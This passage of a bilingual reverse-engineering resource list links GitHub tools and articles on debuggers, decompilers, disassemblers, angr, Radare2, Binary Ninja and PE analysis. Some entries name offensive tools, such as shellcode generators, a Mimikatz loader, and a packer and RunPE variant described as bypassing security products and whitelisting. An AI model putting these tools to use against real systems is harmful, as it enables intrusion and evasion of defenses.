- [**507**星][8m] [JS] [mindedsecurity/jstillery](https://github.com/mindedsecurity/jstillery) Advanced JavaScript Deobfuscation via Partial Evaluation
- [**449**星][12m] [C++] [ntquery/scylla](https://github.com/ntquery/scylla) Imports Reconstructor
- [**447**星][3m] [Go] [retroplasma/flyover-reverse-engineering](https://github.com/retroplasma/flyover-reverse-engineering) Reversing Apple's 3D satellite mode
- [**446**星][11m] [Batchfile] [ion-storm/sysmon-config](https://github.com/ion-storm/sysmon-config) Advanced Sysmon configuration, Installer & Auto Updater with high-quality event tracing
- [**408**星][19d] [Py] [crytic/slither](https://github.com/crytic/slither) Static Analyzer for Solidity
- [**383**星][1y] [HTML] [maestron/reverse-engineering-tutorials](https://github.com/maestron/reverse-engineering-tutorials) Reverse Engineering Tutorials
- [**344**星][1y] [Ruby] [calebfenton/dex-oracle](https://github.com/calebfenton/dex-oracle) A pattern based Dalvik deobfuscator which uses limited execution to improve semantic analysis
- [**308**星][25d] [Py] [baderj/domain_generation_algorithms](https://github.com/baderj/domain_generation_algorithms) 域名生成算法
- [**306**星][2m] [C] [nagyd/sdlpop](https://github.com/nagyd/sdlpop) An open-source port of Prince of Persia, based on the disassembly of the DOS version.
- [**291**星][28d] [C] [tomb5/tomb5](https://github.com/tomb5/tomb5) Chronicles Disassembly translated to C source code.
- [**265**星][3m] [Assembly] [pret/pokeyellow](https://github.com/pret/pokeyellow) Disassembly of Pokemon Yellow
- [**240**星][4m] [JS] [consensys/surya](https://github.com/consensys/surya) A set of utilities for exploring Solidity contracts
- [**214**星][2m] [Py] [rpisec/llvm-deobfuscator](https://github.com/rpisec/llvm-deobfuscator)
- [**211**星][12m] [Java] [neo23x0/fnord](https://github.com/neo23x0/fnord) Pattern Extractor for Obfuscated Code
***
## <a id="bc2b78af683e7ba983205592de8c3a7a"></a>工具-其他
***
## <a id="4fe330ae3e5ce0b39735b1bfea4528af"></a>angr
### <a id="1ede5ade1e55074922eb4b6386f5ca65"></a>工具
- [**534**星][12d] [Py] [angr/angr-doc](https://github.com/angr/angr-doc) Documentation for the angr suite
- [**305**星][2m] [Py] [salls/angrop](https://github.com/salls/angrop) a rop gadget finder and chain builder
### <a id="042ef9d415350eeb97ac2539c2fa530e"></a>文章
- 2016.04 [] [Solving kao's toy project with symbolic execution and angr](https://0xec.blogspot.com/2016/04/solving-kaos-toy-project-with-symbolic.html)
- 2016.02 [theobsidiantower] [Angr and me](https://theobsidiantower.com/2016/02/11/4047a80b3927bd0a09363e7ccd202effe4b336aa.html)
- 2014.08 [3xp10it] [angr解题](http://3xp10it.cc/%E4%BA%8C%E8%BF%9B%E5%88%B6/2017/11/16/angr%E8%A7%A3%E9%A2%98/)
- 2014.08 [3xp10it] [angr解题](http://3xp10it.cc/%E4%BA%8C%E8%BF%9B%E5%88%B6/2017/11/16/angr%E8%A7%A3%E9%A2%98/)
***
## <a id="324874bb7c3ead94eae6f1fa1af4fb68"></a>Debug&&调试
### <a id="d22bd989b2fdaeda14b64343b472dfb6"></a>工具
- [**1450**星][10d] [Go] [google/gapid](https://github.com/google/gapid) Graphics API Debugger
- [**1422**星][17d] [C++] [eteran/edb-debugger](https://github.com/eteran/edb-debugger) edb is a cross platform AArch32/x86/x86-64 debugger.
- [**1413**星][19d] [Go] [cosmos72/gomacro](https://github.com/cosmos72/gomacro) Interactive Go interpreter and debugger with REPL, Eval, generics and Lisp-like macros
- [**1275**星][4m] [Go] [solo-io/squash](https://github.com/solo-io/squash) The debugger for microservices
- [**1147**星][5m] [C++] [cgdb/cgdb](https://github.com/cgdb/cgdb) Console front-end to the GNU debugger
- [**1128**星][20d] [C] [blacksphere/blackmagic](https://github.com/blacksphere/blackmagic) In application debugger for ARM Cortex microcontrollers.
- [**899**星][10d] [Py] [derekselander/lldb](https://github.com/derekselander/lldb) A collection of LLDB aliases/regexes and Python scripts to aid in your debugging sessions
- [**836**星][8d] [C++] [tasvideos/bizhawk](https://github.com/tasvideos/bizhawk) BizHawk is a multi-system emulator written in C#. BizHawk provides nice features for casual gamers such as full screen, and joypad support in addition to full rerecording and debugging tools for all system cores.
- [**560**星][21d] [C#] [microsoft/miengine](https://github.com/microsoft/miengine) The Visual Studio MI Debug Engine ("MIEngine") provides an open-source Visual Studio Debugger extension that works with MI-enabled debuggers such as gdb, lldb, and clrdbg.
- [**521**星][1y] [C] [wubingzheng/memleax](https://github.com/wubingzheng/memleax) debugs memory leak of running process. Not maintained anymore, try `libleak` please.
- [**462**星][5m] [C++] [emoon/prodbg](https://github.com/emoon/prodbg) Debugging the way it's meant to be done
- [**423**星][4m] [C++] [cobaltfusion/debugviewpp](https://github.com/cobaltfusion/debugviewpp) DebugView++, collects, views, filters your application logs, and highlights information that is important to you!
- [**418**星][26d] [C++] [simonkagstrom/kcov](https://github.com/simonkagstrom/kcov) Code coverage tool for compiled programs, Python and Bash which uses debugging information to collect and report data without special compilation options
- [**377**星][1m] [Py] [pdbpp/pdbpp](https://github.com/pdbpp/pdbpp) pdb++, a drop-in replacement for pdb (the Python debugger)
- [**332**星][8m] [Py] [romanvm/python-web-pdb](https://github.com/romanvm/python-web-pdb) Web-based remote UI for Python's PDB debugger
- [**306**星][21d] [Java] [widdix/aws-s3-virusscan](https://github.com/widdix/aws-s3-virusscan) Free Antivirus for S3 Buckets
- [**291**星][12d] [Py] [sosreport/sos](https://github.com/sosreport/sos) A unified tool for collecting system logs and other debug information
- [**285**星][2m] [C++] [changeofpace/viviennevmm](https://github.com/changeofpace/viviennevmm) VivienneVMM is a stealthy debugging framework implemented via an Intel VT-x hypervisor.
- [**272**星][4m] [Py] [mariovilas/winappdbg](https://github.com/mariovilas/winappdbg) WinAppDbg Debugger
- [**270**星][21d] [Py] [ionelmc/python-manhole](https://github.com/ionelmc/python-manhole) Debugging manhole for python applications.
- [**250**星][2m] [Py] [quantopian/qdb](https://github.com/quantopian/qdb) Quantopian Remote Debugger for Python
- [**240**星][6m] [C++] [facebook/ds2](https://github.com/facebook/ds2) Debug server for lldb.
- [**239**星][8m] [C++] [strivexjun/xantidebug](https://github.com/strivexjun/xantidebug) VMProtect 3.x Anti-debug Method Improved
- [**239**星][8m] [Py] [beeware/bugjar](https://github.com/beeware/bugjar) A interactive graphical debugger for Python code.
- [**233**星][2m] [Py] [gilligan/vim-lldb](https://github.com/gilligan/vim-lldb) lldb debugger integration plugin for vim
- [**220**星][9m] [letoram/senseye](https://github.com/letoram/senseye) Dynamic Visual Debugging / Reverse Engineering Toolsuite
- [**218**星][2m] [Py] [nteseyes/pylane](https://github.com/nteseyes/pylane) An python vm injector with debug tools, based on gdb.
- [**213**星][12d] [C++] [thalium/icebox](https://github.com/thalium/icebox) Virtual Machine Introspection, Tracing & Debugging
- [**209**星][2m] [C] [joyent/mdb_v8](https://github.com/joyent/mdb_v8) postmortem debugging for Node.js and other V8-based programs
- [**200**星][6m] [C++] [rainers/cv2pdb](https://github.com/rainers/cv2pdb) converter of DMD CodeView/DWARF debug information to PDB files
### <a id="136c41f2d05739a74c6ec7d8a84df1e8"></a>文章
***
## <a id="9f8d3f2c9e46fbe6c25c22285c8226df"></a>BAP
### <a id="f10e9553770db6f98e8619dcd74166ef"></a>工具
- [**1106**星][14d] [OCaml] [binaryanalysisplatform/bap](https://github.com/binaryanalysisplatform/bap) Binary Analysis Platform
- [**411**星][13d] [HTML] [w3c/webappsec](https://github.com/w3c/webappsec) Web App安全工作组
- [**299**星][17d] [JS] [w3c/webappsec-trusted-types](https://github.com/w3c/webappsec-trusted-types) A browser API to prevent DOM-Based Cross Site Scripting in modern web applications.
### <a id="e111826dde8fa44c575ce979fd54755d"></a>文章
***
## <a id="2683839f170250822916534f1db22eeb"></a>BinNavi
### <a id="2e4980c95871eae4ec0e76c42cc5c32f"></a>工具
- [**382**星][26d] [C++] [google/binexport](https://github.com/google/binexport) 将反汇编以Protocol Buffer的形式导出为PostgreSQL数据库, 导入到BinNavi中使用
- 重复区段: [IDA->插件->导入导出->BinNavi](#11139e7d6db4c1cef22718868f29fe12) |
### <a id="ff4dc5c746cb398d41fb69a4f8dfd497"></a>文章
- 2015.12 [summitroute] [Setting up fREedom and BinNavi](https://summitroute.com/blog/2015/12/31/setting_up_freedom_and_binnavi/)
- 2015.12 [addxorrol] [Open-Source BinNavi ... and fREedom](http://addxorrol.blogspot.com/2015/12/open-source-binnavi-and-freedom.html)
- 2015.08 [freebuf] [逆向分析神器BinNavi开源了](http://www.freebuf.com/sectool/75529.html)
- 2008.11 [addxorrol] [BinDiff / BinNavi User Forum](http://addxorrol.blogspot.com/2008/11/bindiff-binnavi-user-forum.html)
- 2008.11 [addxorrol] [BinNavi v2 and PHP !](http://addxorrol.blogspot.com/2008/11/binnavi-v2-and-php.html)
***
## <a id="0971f295b0f67dc31b7aa45caf3f588f"></a>Decompiler&&反编译器
### <a id="e67c18b4b682ceb6716388522f9a1417"></a>工具
- [**20779**星][8d] [Java] [skylot/jadx](https://github.com/skylot/jadx) dex 转 java 的反编译器
- [**7733**星][1m] [Java] [java-decompiler/jd-gui](https://github.com/java-decompiler/jd-gui) A standalone Java Decompiler GUI
- [**3135**星][26d] [Java] [deathmarine/luyten](https://github.com/deathmarine/luyten) An Open Source Java Decompiler Gui for Procyon
- [**1867**星][1y] [Java] [jindrapetrik/jpexs-decompiler](https://github.com/jindrapetrik/jpexs-decompiler) JPEXS Free Flash Decompiler
- [**1652**星][12m] [Java] [fesh0r/fernflower](https://github.com/fesh0r/fernflower) Unofficial mirror of FernFlower Java decompiler (All pulls should be submitted upstream)
- [**1466**星][12d] [Py] [rocky/python-uncompyle6](https://github.com/rocky/python-uncompyle6) Python反编译器,跨平台
- [**1084**星][4m] [Py] [storyyeller/krakatau](https://github.com/storyyeller/krakatau) Java decompiler, assembler, and disassembler
- [**764**星][12m] [C++] [comaeio/porosity](https://github.com/comaeio/porosity) *UNMAINTAINED* Decompiler and Security Analysis tool for Blockchain-based Ethereum Smart-Contracts
- [**673**星][18d] [C#] [uxmal/reko](https://github.com/uxmal/reko) Reko is a binary decompiler.
- [**671**星][11m] [C++] [zrax/pycdc](https://github.com/zrax/pycdc) C++ python bytecode disassembler and decompiler
- [**538**星][6m] [Java] [java-decompiler/jd-eclipse](https://github.com/java-decompiler/jd-eclipse) A Java Decompiler Eclipse plugin
- [**347**星][16d] [C#] [steamdatabase/valveresourceformat](https://github.com/steamdatabase/valveresourceformat) Valve's Source 2 resource file format (also known as Stupid Valve Format) parser and decompiler.
- [**331**星][11d] [Java] [leibnitz27/cfr](https://github.com/leibnitz27/cfr) This is the public repository for the CFR Java decompiler
- [**327**星][2m] [C++] [silverf0x/rpcview](https://github.com/silverf0x/rpcview) RpcView is a free tool to explore and decompile Microsoft RPC interfaces
- [**283**星][8m] [Shell] [venshine/decompile-apk](https://github.com/venshine/decompile-apk) APK 反编译
- [**243**星][3m] [Java] [kwart/jd-cmd](https://github.com/kwart/jd-cmd) Command line Java Decompiler
- [**242**星][11d] [C#] [icsharpcode/avaloniailspy](https://github.com/icsharpcode/avaloniailspy) Avalonia-based .NET Decompiler (port of ILSpy)
- [**240**星][2m] [Java] [ata4/bspsrc](https://github.com/ata4/bspsrc) A Source engine map decompiler
- [**232**星][1y] [C++] [wwwg/wasmdec](https://github.com/wwwg/wasmdec) WebAssembly to C decompiler
- [**226**星][11d] [C++] [boomerangdecompiler/boomerang](https://github.com/BoomerangDecompiler/boomerang) Boomerang Decompiler - Fighting the code-rot :)
### <a id="a748b79105651a8fd8ae856a7dc2b1de"></a>文章
***
## <a id="2df6d3d07e56381e1101097d013746a0"></a>Disassemble&&反汇编
### <a id="59f472c7575951c57d298aef21e7d73c"></a>工具
- [**1374**星][20d] [C] [zyantific/zydis](https://github.com/zyantific/zydis) 快速的轻量级x86/x86-64 反汇编库
- [**1346**星][12m] [Rust] [das-labor/panopticon](https://github.com/das-labor/panopticon) A libre cross-platform disassembler.
- [**877**星][11m] [C++] [wisk/medusa](https://github.com/wisk/medusa) An open source interactive disassembler
- [**835**星][8d] [GLSL] [khronosgroup/spirv-cross](https://github.com/khronosgroup/spirv-cross) a practical tool and library for performing reflection on SPIR-V and disassembling SPIR-V back to high level languages.
- [**828**星][3m] [C++] [redasmorg/redasm](https://github.com/redasmorg/redasm) The OpenSource Disassembler
- [**627**星][3m] [C] [gdabah/distorm](https://github.com/gdabah/distorm) Powerful Disassembler Library For x86/AMD64
- [**430**星][2m] [C#] [0xd4d/iced](https://github.com/0xd4d/iced) x86/x64 disassembler, instruction decoder & encoder
- [**351**星][21d] [Ruby] [jjyg/metasm](https://github.com/jjyg/metasm) This is the main repository for metasm, a free assembler / disassembler / compiler written in ruby
- [**246**星][5m] [Py] [bontchev/pcodedmp](https://github.com/bontchev/pcodedmp) A VBA p-code disassembler
### <a id="a6eb5a22deb33fc1919eaa073aa29ab5"></a>文章
***
## <a id="975d9f08e2771fccc112d9670eae1ed1"></a>GDB
### <a id="5f4381b0a90d88dd2296c2936f7e7f70"></a>工具
- [**7019**星][10d] [JS] [cs01/gdbgui](https://github.com/cs01/gdbgui) Browser-based frontend to gdb (gnu debugger). Add breakpoints, view the stack, visualize data structures, and more in C, C++, Go, Rust, and Fortran. Run gdbgui from the terminal and a new tab will open in your browser.
- [**6052**星][13d] [Py] [cyrus-and/gdb-dashboard](https://github.com/cyrus-and/gdb-dashboard) Modular visual interface for GDB in Python
- [**3784**星][11m] [Py] [longld/peda](https://github.com/longld/peda) Python Exploit Development Assistance for GDB
- [**2568**星][1m] [Py] [hugsy/gef](https://github.com/hugsy/gef) gdb增强工具,使用Python API,用于漏洞开发和逆向分析。
- [**2439**星][16d] [Py] [pwndbg/pwndbg](https://github.com/pwndbg/pwndbg) GDB插件,辅助漏洞开发和逆向
- [**1417**星][3m] [Go] [hellogcc/100-gdb-tips](https://github.com/hellogcc/100-gdb-tips) A collection of gdb tips. 100 maybe just mean many here.
- [**452**星][3m] [Py] [scwuaptx/pwngdb](https://github.com/scwuaptx/pwngdb) gdb for pwn
- [**446**星][1y] [Py] [jfoote/exploitable](https://github.com/jfoote/exploitable) The 'exploitable' GDB plugin. I don't work at CERT anymore, but here is the original homepage:
- [**244**星][2m] [JS] [bet4it/hyperpwn](https://github.com/bet4it/hyperpwn) A hyper plugin to provide a flexible GDB GUI with the help of GEF, pwndbg or peda
- [**208**星][2m] [Py] [sakhnik/nvim-gdb](https://github.com/sakhnik/nvim-gdb) Neovim thin wrapper for GDB, LLDB and PDB
### <a id="37b17362d72f9c8793973bc4704893a2"></a>文章
- 2019.11 [ocallahan] [Supercharging Gdb With Pernosco](https://robert.ocallahan.org/2019/11/supercharging-gdb-with-pernosco.html)
- 2019.10 [FOSSiFoundation] [A Unified Debug Server for Deeply Embedded Systems and GDB/LLDB - Simon Cook - ORConf 2019](https://www.youtube.com/watch?v=bfxHGq2m8M8)
- 2019.10 [TheLinuxFoundation] [Using Serial kdb / kgdb to Debug the Linux Kernel - Douglas Anderson, Google](https://www.youtube.com/watch?v=HBOwoSyRmys)
- 2019.09 [GNUToolsCauldron] [GDB: Tab-Completion & Command Options - GNU Tools Cauldron 2019](https://www.youtube.com/watch?v=jEllWJ0at9o)
- 2019.09 [GNUToolsCauldron] [GDB on s390x: To-dos and Challenges - GNU Tools Cauldron 2019](https://www.youtube.com/watch?v=iQAd5Atlz1s)
- 2019.09 [GNUToolsCauldron] [GDB BoF - GNU Tools Cauldron 2019](https://www.youtube.com/watch?v=vdzpbnGDvZM)
- 2019.09 [GNUToolsCauldron] [A New Debug Server for Supporting GDB on Embedded Platforms - GNU Tools Cauldron 2019](https://www.youtube.com/watch?v=mQYKEzWAoqI)
- 2019.05 [tunnelshade] [Quick linux kernel with gdb setup with little help from Linux distros](https://tunnelshade.in/blog/2019/05/linux-kernel-gdb-setup/)
- 2019.02 [360] [ARM汇编之堆栈溢出实战分析四(GDB)](https://www.anquanke.com/post/id/170651/)
- 2019.01 [freebuf] [ARM汇编之堆栈溢出实战分析三(GDB)](https://www.freebuf.com/news/193664.html)
- 2019.01 [360] [ARM汇编之堆栈溢出实战分析二(GDB)](https://www.anquanke.com/post/id/169186/)
- 2019.01 [360] [ARM汇编之堆栈溢出实战分析(GDB)](https://www.anquanke.com/post/id/169071/)
- 2018.09 [blackroomsec] [Reversing small crackme w/ GDB-Peda](https://www.blackroomsec.com/reversing-small-crackme-w-gdb-peda/)
- 2018.09 [doyler] [Metasploit adduser Analysis via GDB (SLAE Exam Assignment #5.2)](https://www.doyler.net/security-not-included/metasploit-adduser-analysis)
- 2018.07 [pediy] [[编程][翻译] 用 gdb 学 C 语言](https://bbs.pediy.com/thread-229985.htm)
- 2018.05 [djmanilaice] [Ignorance .gdbinit](http://djmanilaice.blogspot.com/2018/05/ignorance-gdbinit.html)
- 2018.05 [360] [DEFCON CHINA议题解读 | Triton和符号执行在 GDB 上](https://www.anquanke.com/post/id/144984/)
- 2018.03 [aliyun] [利用GDB实现进程注入](https://xz.aliyun.com/t/2164)
- 2018.02 [freebuf] [GDB调试CVE-2018-5711 PHP-GD拒绝服务漏洞](http://www.freebuf.com/vuls/162029.html)
- 2018.02 [HITCON] [[HITCON CMT 2017] R0D202 - 陳威伯 - Triton and Symbolic execution on GDB](https://www.youtube.com/watch?v=LOTQIAVXdCI)
***
## <a id="70e64e3147675c9bcd48d4f475396e7f"></a>Monitor&&监控&&Trace&&追踪
### <a id="cd76e644d8ddbd385939bb17fceab205"></a>工具
- [**1419**星][9m] [C] [namhyung/uftrace](https://github.com/namhyung/uftrace) Function (graph) tracer for user-space
# <a id="86cb7d8f548ca76534b5828cb5b0abce"></a>Radare2
***
## <a id="0e08f9478ed8388319f267e75e2ef1eb"></a>插件&&脚本
### <a id="ec3f0b5c2cf36004c4dd3d162b94b91a"></a>Radare2
- [**11588**星][12d] [C] [radareorg/radare2](https://github.com/radareorg/radare2) unix-like reverse engineering framework and commandline tools
### <a id="6922457cb0d4b6b87a34caf39aa31dfe"></a>新添加的
- [**410**星][6m] [Py] [itayc0hen/a-journey-into-radare2](https://github.com/itayc0hen/a-journey-into-radare2) A series of tutorials about radare2 framework from
- [**339**星][28d] [TeX] [radareorg/radare2book](https://github.com/radareorg/radare2book) Radare2 official book
- [**259**星][1m] [C] [radareorg/r2dec-js](https://github.com/radareorg/r2dec-js) radare2插件,将汇编代码反编译为C伪代码
- [**258**星][4m] [Rust] [radareorg/radeco](https://github.com/radareorg/radeco) radare2-based decompiler and symbol executor
- [**202**星][3m] [PS] [wiredpulse/posh-r2](https://github.com/wiredpulse/posh-r2) PowerShell - Rapid Response... For the incident responder in you!
### <a id="1a6652a1cb16324ab56589cb1333576f"></a>与其他工具交互
#### <a id="dfe53924d678f9225fc5ece9413b890f"></a>未分类
- [**378**星][27d] [JS] [nowsecure/r2frida](https://github.com/nowsecure/r2frida) Radare2 and Frida better together.
- 重复区段: [DBI->Frida->工具->与其他工具交互->Radare2](#ac053c4da818ca587d57711d2ff66278) |
#### <a id="1cfe869820ecc97204a350a3361b31a7"></a>IDA
### <a id="f7778a5392b90b03a3e23ef94a0cc3c6"></a>GUI
#### <a id="8f151d828263d3bc038f75f8d6418758"></a>GUI
#### <a id="df45c3c60bd074e21d650266aa85c241"></a>Cutter
- [**6176**星][8d] [C++] [radareorg/cutter](https://github.com/radareorg/cutter) 逆向框架 radare2的Qt界面,iaito的升级版
***
## <a id="95fdc7692c4eda74f7ca590bb3f12982"></a>文章&&视频
### <a id="a4debf888d112b91e56c90136f513ec0"></a>未分类
- 2019.10 [prsecurity] [Radare2 for RE CTF](https://medium.com/p/e0163cb0466e)
- 2019.09 [securityartwork] [YaraRET (I): Carving with Radare2 & Yara](https://www.securityartwork.es/2019/09/02/yararet-i-carving-with-radare2-yara/)
- 2019.07 [freebuf] [教你使用Cutter和Radare2对APT32恶意程序流程图进行反混淆处理](https://www.freebuf.com/articles/network/208019.html)
- 2019.07 [THER] [0x0D - FLARE-On #3 Challenge Part 2 [Reversing with Radare2]](https://www.youtube.com/watch?v=QP9Cepdqf-o)
- 2019.07 [THER] [0x09 Cross References [Reversing with Radare2]](https://www.youtube.com/watch?v=yOtx6LL_R08)
- 2019.07 [THER] [0x08 Navigation [Reversing with Radare2]](https://www.youtube.com/watch?v=rkygJSjJbso)
- 2019.07 [THER] [0x04 Target Application [Reversing with Radare2]](https://www.youtube.com/watch?v=jlr3FablVIc)
- 2019.06 [THER] [0x03 Environment Setup [Reversing with Radare2]](https://www.youtube.com/watch?v=qGSFk_CkIaw)
- 2019.06 [THER] [0x02 What is Radare2 [Reversing with Radare2]](https://www.youtube.com/watch?v=9fLfD2fZWiA)
- 2019.06 [THER] [0x00 Intro [Reversing with Radare2]](https://www.youtube.com/watch?v=Lva32dXS0mU)
- 2019.06 [hitbsecconf] [#HITB2019AMS D1T3 - Overcoming Fear: Reversing With Radare2 - Arnau Gamez Montolio](https://www.youtube.com/watch?v=317dNavABKo)
- 2019.05 [X0x0FFB347] [Solving MalwareTech Shellcode challenges with some radare2 magic!](https://medium.com/p/b91c85babe4b)
- 2019.05 [360] [使用Cutter和Radare2对APT32恶意程序流程图进行反混淆处理](https://www.anquanke.com/post/id/178047/)
- 2019.05 [SagiDana] [Radare2 — Keep It Or Leave It?](https://medium.com/p/3d45059ec0d1)
- 2019.04 [X0x0FFB347] [Solving MalwareTech String Challenges With Some Radare2 Magic!](https://medium.com/p/98ebd8ff0b88)
- 2019.04 [radare] [Radare2 Summer of Code 2019 Selection Results](https://radareorg.github.io/blog/posts/rsoc-2019-selection/)
- 2019.04 [radare] [Radare2 Summer of Code 2019 Selection Results](http://radare.today/posts/rsoc-2019-selection/)
- 2019.03 [sans] [Binary Analysis with Jupyter and Radare2](https://isc.sans.edu/forums/diary/Binary+Analysis+with+Jupyter+and+Radare2/24748/)
- 2019.02 [freebuf] [Radare2:一款类Unix命令行逆向安全框架](https://www.freebuf.com/sectool/195703.html)
- 2019.02 [radare] [Radare2 Community Survey Results](http://radare.today/posts/radare2-survey/)
### <a id="d86e19280510aee0bcf2599f139cfbf7"></a>Cutter
- 2019.12 [megabeets] [5 Ways to patch binaries with Cutter](https://www.megabeets.net/5-ways-to-patch-binaries-with-cutter/)
- 2019.07 [THER] [0x0C - Cutter: FLARE-On #3 Challenge Part 1 [Reversing with Radare2]](https://www.youtube.com/watch?v=hbEpVwD5rJI)
- 2018.10 [PancakeNopcode] [r2con2018 - Cutter by @xarkes](https://www.youtube.com/watch?v=w8Bl5ZSmmZM)
- 2018.08 [radare] [GSoC 2018 Final: Debugging and Emulation Support for Cutter](https://radareorg.github.io/blog/posts/cutter_debug/)
- 2017.12 [n0where] [Qt C++ radare2 GUI: Cutter](https://n0where.net/qt-c-radare2-gui-cutter)
# <a id="afb7259851922935643857c543c4b0c2"></a>BinaryNinja
***
## <a id="3034389f5aaa9d7b0be6fa7322340aab"></a>插件&&脚本
### <a id="a750ac8156aa0ff337a8639649415ef1"></a>新添加的
- [**2820**星][1m] [Py] [androguard/androguard](https://github.com/androguard/androguard) Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !)
- [**328**星][5m] [Py] [vector35/binaryninja-api](https://github.com/vector35/binaryninja-api) Public API, examples, documentation and issues for Binary Ninja
- [**280**星][3m] [Py] [pbiernat/ripr](https://github.com/pbiernat/ripr) Package Binary Code as a Python class using Binary Ninja and Unicorn Engine
- [**201**星][14d] [JS] [ret2got/disasm.pro](https://github.com/ret2got/disasm.pro) A realtime assembler/disassembler (formerly known as disasm.ninja)
### <a id="bba1171ac550958141dfcb0027716f41"></a>与其他工具交互
#### <a id="c2f94ad158b96c928ee51461823aa953"></a>未分类
#### <a id="713fb1c0075947956651cc21a833e074"></a>IDA
***
## <a id="2d24dd6f0c01a084e88580ad22ce5b3c"></a>文章&&视频
- 2019.08 [trailofbits] [Reverse Taint Analysis Using Binary Ninja](http://blog.trailofbits.com/2019/08/29/reverse-taint-analysis-using-binary-ninja/)
- 2018.09 [aliyun] [使用Binary Ninja调试共享库](https://xz.aliyun.com/t/2826)
- 2018.09 [kudelskisecurity] [Analyzing ARM Cortex-based MCU firmwares using Binary Ninja](https://research.kudelskisecurity.com/2018/09/25/analyzing-arm-cortex-based-mcu-firmwares-using-binary-ninja/)
- 2018.07 [aliyun] [WCTF 2018 - binja - rswc](https://xz.aliyun.com/t/2436)
- 2018.04 [trailofbits] [使用Binary Ninja的MLIL和SSA, 挖掘二进制文件的漏洞. (MLIL: Medium Level IL, 中间层IL)(SSA: Single Static Assignment)](https://blog.trailofbits.com/2018/04/04/vulnerability-modeling-with-binary-ninja/)
- 2018.01 [pediy] [[翻译]逆向平台Binary Ninja介绍](https://bbs.pediy.com/thread-224141.htm)
- 2017.11 [] [bnpy - A python architecture plugin for Binary Ninja](https://0xec.blogspot.com/2017/11/bnpy-python-architecture-plugin-for.html)
- 2017.10 [ret2] [Untangling Exotic Architectures with Binary Ninja](http://blog.ret2.io/2017/10/17/untangling-exotic-architectures-with-binary-ninja/)
- 2017.10 [chokepoint] [Pin Visual Coverage Tool for Binary Ninja](http://www.chokepoint.net/2017/10/pin-visual-coverage-tool-for-binary.html)
- 2017.03 [GynvaelEN] [Hacking Livestream #14: Binary Ninja Plugins (with carstein)](https://www.youtube.com/watch?v=c9Tn2nEPp7A)
- 2016.12 [kchung] [Binary Ninja: IPython and the Python Console](https://blog.kchung.co/binary-ninja-ipython-and-the-python-console/)
- 2016.03 [arm] [Introduction to the Binary Ninja API](http://arm.ninja/2016/03/08/intro-to-binary-ninja-api/)
# <a id="2f81493de610f9b796656b269380b2de"></a>Windows
***
## <a id="620af0d32e6ac1f4a3e97385d4d3efc0"></a>PE
### <a id="574db8bbaafbee72eeb30e28e2799458"></a>工具
- [**877**星][8m] [Py] [erocarrera/pefile](https://github.com/erocarrera/pefile) pefile is a Python module to read and work with PE (Portable Executable) files
- [**634**星][10d] [C] [thewover/donut](https://github.com/thewover/donut) Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters
- [**537**星][1y] [C#] [ghostpack/safetykatz](https://github.com/ghostpack/safetykatz) Mimikatz和 .NET PE Loader的结合
- [**388**星][1y] [Assembly] [hasherezade/pe_to_shellcode](https://github.com/hasherezade/pe_to_shellcode) Converts PE into a shellcode
- [**385**星][3m] [Jupyter Notebook] [endgameinc/ember](https://github.com/endgameinc/ember) 110万PE文件的数据集合, 可用于训练相关模型. PE文件信息主要包括: SHA256/histogram(直方图)/byteentropy(字节熵)/字符串/PE头信息/段信息/导入表/导出表
- [**344**星][1y] [Assembly] [egebalci/amber](https://github.com/egebalci/amber) 反射式PE加壳器,用于绕过安全产品和缓解措施
- [**337**星][5m] [C] [merces/pev](https://github.com/merces/pev) The PE file analysis toolkit
- [**316**星][24d] [C++] [trailofbits/pe-parse](https://github.com/trailofbits/pe-parse) Principled, lightweight C/C++ PE parser
- [**315**星][14d] [VBA] [itm4n/vba-runpe](https://github.com/itm4n/vba-runpe) A VBA implementation of the RunPE technique or how to bypass application whitelisting.
- [**296**星][12d] [C++] [hasherezade/libpeconv](https://github.com/hasherezade/libpeconv) 用于映射和取消映射PE 文件的库
- [**285**星][7m] [Java] [katjahahn/portex](https://github.com/katjahahn/portex) Java library to analyse Portable Executable files with a special focus on malware analysis and PE malformation robustness
### <a id="7e890d391fa32df27beb1377a371518b"></a>文章
- 2019.12 [aliyun] [手工shellcode注入PE文件](https://xz.aliyun.com/t/6939)
- 2019.10 [freebuf] [PEpper:一款针对可执行程序的开源恶意软件静态分析工具](https://www.freebuf.com/sectool/214265.html)
- 2019.09 [sevagas] [Process PE Injection Basics](https://blog.sevagas.com/?Process-PE-Injection-Basics)
- 2019.07 [hexacorn] [PE Section names – re-visited, again](http://www.hexacorn.com/blog/2019/07/26/pe-section-names-re-visited-again/)
- 2019.06 [hasherezade] [PE-sieve v0.2.1 release notes - import recovery & unpacking ASPack (part 2)](https://www.youtube.com/watch?v=-YVrU4-507A)
- 2019.05 [0x00sec] [Backdoorin pe files](https://0x00sec.org/t/backdoorin-pe-files/13912/)
- 2019.05 [360] [Windows调试艺术——PE文件变形(一)](https://www.anquanke.com/post/id/178088/)
- 2019.05 [arxiv] [[1905.01999] A Benchmark API Call Dataset for Windows PE Malware Classification](https://arxiv.org/abs/1905.01999)
- 2019.04 [decoder] [Combinig LUAFV PostLuafvPostReadWrite Race Condition PE with DiagHub collector exploit -> from standard user to SYSTEM](https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/)
- 2019.04 [MalwareAnalysisForHedgehogs] [Malware Theory - PE Malformations and Anomalies](https://www.youtube.com/watch?v=-0DEEbQq8jU)
- 2019.04 [freebuf] [Xori:一款针对PE32和Shellcode的自动化反编译与静态分析库](https://www.freebuf.com/sectool/199629.html)
- 2019.03 [hexacorn] [PE files and the DemoScene](http://www.hexacorn.com/blog/2019/03/14/pe-files-and-the-demoscene/)
- 2019.03 [] [携带恶意PE文件的壁纸类应用出现在Google Play](http://blogs.360.cn/post/malicious_PE_files_discovered_on_Google%20Play.html)
- 2019.03 [] [携带恶意PE文件的壁纸类应用出现在Google Play](http://blogs.360.cn/post/malicious_PE_files_discovered_on_Google%20Play.html)
- 2019.03 [] [Malicious PE files discovered on Google Play](http://blogs.360.cn/post/malicious_PE_files_discovered_on_GooglePlay_EN.html)
- 2019.03 [hexacorn] [PE Compilation Timestamps vs. forensics](http://www.hexacorn.com/blog/2019/03/11/pe-compilation-timestamps-vs-forensics/)
- 2019.03 [cristivlad25] [Machine Learning for Malware Detection - 4 - Portable Executable (PE) Files](https://www.youtube.com/watch?v=2Pr6MNcXLFE)
